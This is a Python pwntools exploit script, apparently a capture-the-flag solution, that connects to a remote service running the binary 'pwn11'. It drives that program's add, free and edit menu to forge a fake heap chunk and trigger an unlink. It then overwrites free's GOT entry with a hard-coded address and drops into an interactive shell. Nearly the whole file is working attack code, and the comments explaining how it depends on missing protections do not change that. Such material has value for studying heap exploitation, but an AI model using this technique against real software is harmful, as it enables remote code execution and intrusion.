
from pwn import *
def conn():
    """Open the connection used by every helper below and load the target ELF.

    Publishes two module globals that the other functions read:
    ``r`` (the pwntools tube) and ``elf`` (the parsed ./pwn11 binary,
    used for GOT lookups).  No value is returned.
    """
    global r, elf
    # Local alternative kept by the author for offline debugging:
    # r = process("./pwn11")
    host, port = "1.95.36.136", 2078
    r = remote(host, port)
    elf = ELF("./pwn11")
def add(x):
    """Drive menu option 1 ("add"): request a chunk of the given size.

    Args:
        x: size to send; rendered as a decimal string and encoded to bytes.

    Relies on the module global ``r`` set by conn().
    """
    size_bytes = str(x).encode()
    r.sendlineafter(b"choice:\n", b"1")
    r.sendlineafter(b"size:\n", size_bytes)
def free(x):
    """Drive menu option 2 ("free") for the chunk at index ``x``.

    Args:
        x: slot index; rendered as a decimal string and encoded to bytes.

    Relies on the module global ``r`` set by conn().
    """
    index_bytes = str(x).encode()
    r.sendlineafter(b"choice:\n", b"2")
    r.sendlineafter(b"index:\n", index_bytes)
def edit(x, y):
    """Drive menu option 3 ("edit"): write ``y`` into the chunk at index ``x``.

    Args:
        x: slot index.  NOTE(review): sent as ``str(x)`` (a text string),
           unlike add()/free() which encode to bytes; the tube is left to
           handle the conversion — behaviour preserved as the author wrote it.
        y: bytes to write.  Its exact length is announced first, so the
           program is told the payload length rather than any fixed size.

    Relies on the module global ``r`` set by conn().
    """
    length_bytes = str(len(y)).encode()
    r.sendlineafter(b"choice:\n", b"3")
    r.sendlineafter(b"index:\n", str(x))
    r.sendlineafter(b"length:\n", length_bytes)
    r.sendlineafter(b"content:\n", y)
def pwn():
    """Interaction sequence against the heap-menu program opened by conn().

    The sequence below is the classic heap "unlink" corruption pattern:
    a fake chunk is written into slot 3 so that its fd/bk point back at a
    global address (``target``), the adjacent 0x80 chunk is freed, and the
    resulting pointer write is then used to redirect an edit() at the GOT.
    Defensively, this depends on two things being absent in the target:
    a read-only GOT (FULL RELRO) and the allocator's unlink integrity
    checks rejecting the forged fd/bk.  Hedged notes below mark what cannot
    be confirmed from this file alone.
    """
    # Six allocations; the sizes are the author's, slots are numbered 0..5
    # in allocation order (assumed — the program's indexing is not visible here).
    add(0x30)
    add(0x30)
    add(0x30)
    add(0x30)
    add(0x80)
    add(0x10)
    # Address of the slot being attacked.  0x6010C0 lies in the non-PIE
    # data region; presumably the program's global chunk-pointer array,
    # with +0x18 selecting slot 3 — TODO confirm against ./pwn11.
    target = 0x6010C0 + 0x18
    # Fake fd/bk so that the fake chunk's "neighbours" both point at target,
    # i.e. the layout the unlink consistency check (fd->bk == P, bk->fd == P)
    # expects when target itself holds the fake chunk's address.
    fd = target - 0x18
    bk = target -0x10
    # Fake chunk header (prev_size 0, size 0x30, fd, bk), 0x10 bytes of
    # filler, then the next chunk's header rewritten to prev_size 0x30 and
    # size 0x90 — 0x90 has the low bit clear, so PREV_INUSE is unset.
    payload = p64(0)+p64(0x30)+p64(fd)+p64(bk)+b"a"*(0x10)+p64(0x30)+p64(0x90)
    # edit() announces len(payload), which is larger than the 0x30 slot,
    # so this relies on the program not bounding the write — assumed.
    edit(3,payload)
    # Freeing the 0x80 chunk is presumably what triggers backward
    # consolidation with the fake chunk (and the unlink) — TODO confirm.
    free(4)
    # After the unlink, slot 3 presumably points into the pointer array
    # itself, so this edit rewrites slot 0 to free's GOT entry.
    free_got = elf.got["free"]
    payload = p64(free_got)
    edit(3,payload)
    # Hard-coded in-binary address (0x400000 region, non-PIE).  What it is
    # cannot be determined from this file; the name suggests a call site
    # the author picked — TODO confirm in ./pwn11.  Note: ``sys`` here is a
    # plain int local, not the sys module.
    sys = 0x4009D5
    payload = p64(sys)
    # Writes through slot 0, i.e. into the GOT entry set up above.
    edit(0,payload)
    # Calling free() now dispatches through the rewritten GOT entry.
    free(0)
    # Debugger hook left disabled by the author.
    #gdb.attach(r)
    r.interactive()
# Script entry: connect first, then run the interaction.  Executed at
# import time as well, exactly as the original did.
for step in (conn, pwn):
    step()